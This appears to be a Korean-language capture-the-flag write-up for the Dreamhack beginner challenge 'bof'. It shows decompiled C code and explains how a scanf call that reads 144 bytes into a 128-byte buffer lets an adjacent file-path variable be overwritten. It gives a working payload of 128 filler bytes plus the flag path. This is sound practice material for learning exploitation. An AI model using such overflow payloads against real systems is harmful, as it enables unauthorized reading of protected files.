[Dreamhack] beginner: bof

1. 문제

https://dreamhack.io/wargame/challenges/1111

bof

• The path of the flag file is /home/bof/flag.

2. 풀이

(1) 코드 확인

main(): 사용자의 입력을 받아 read_cat()함수를 호출하고 입력을 출력하는 코드이다. 

이때 ./cat 이 저장되는 v5변수는 16바이트이고, 입력값은 128 바이트의 크기이다. 즉,  v4의 크기가 128바이트인데, scanf로 최대 144바이트를 읽어들이므로, bof가 발생할 수 있는 것이다. 

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4[128]; // [rsp+0h] [rbp-90h] BYREF
  char v5[16]; // [rsp+80h] [rbp-10h] BYREF

  init(argc, argv, envp); // 초기화 함수 호출
  strcpy(v5, "./cat"); // v5에 "./cat" 문자열 복사
  printf("meow? ");
  __isoc99_scanf("%144s", v4); // 입력
  read_cat(v5); // read_cat 함수 호출
  printf("meow, %s :)\n", v4); // 입력 출력
  return 0;
}

 

read_cat(): 주어진 파일 경로(v5)를 열고, 최대 128바이트의 내용을 읽어서 출력한다. (파일 내용 출력)

따라서 입력값으로 128바이트+flag의 경로를 주면 v5에 영향을 줄 것이다. 

int __fastcall read_cat(const char *a1)
{
  int result; // eax
  char s[128]; // [rsp+10h] [rbp-90h] BYREF
  ssize_t v3; // [rsp+90h] [rbp-10h]
  int fd; // [rsp+9Ch] [rbp-4h]

  memset(s, 0, sizeof(s));
  fd = 0;
  fd = open(a1, 0);
  if ( fd == -1 )
  {
    puts("open() error");
    exit(1);
  }
  v3 = read(fd, s, 0x80uLL);
  if ( v3 == -1 )
  {
    puts("read() error");
    exit(1);
  }
  puts(&byte_40201E);
  puts(s);
  result = close(fd);
  if ( result )
  {
    puts("close() error");
    exit(1);
  }
  return result;
}

 

페이로드 생성

payload = 'a' * 128
print(payload)

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/home/bof/flag

 

flag 획득 성공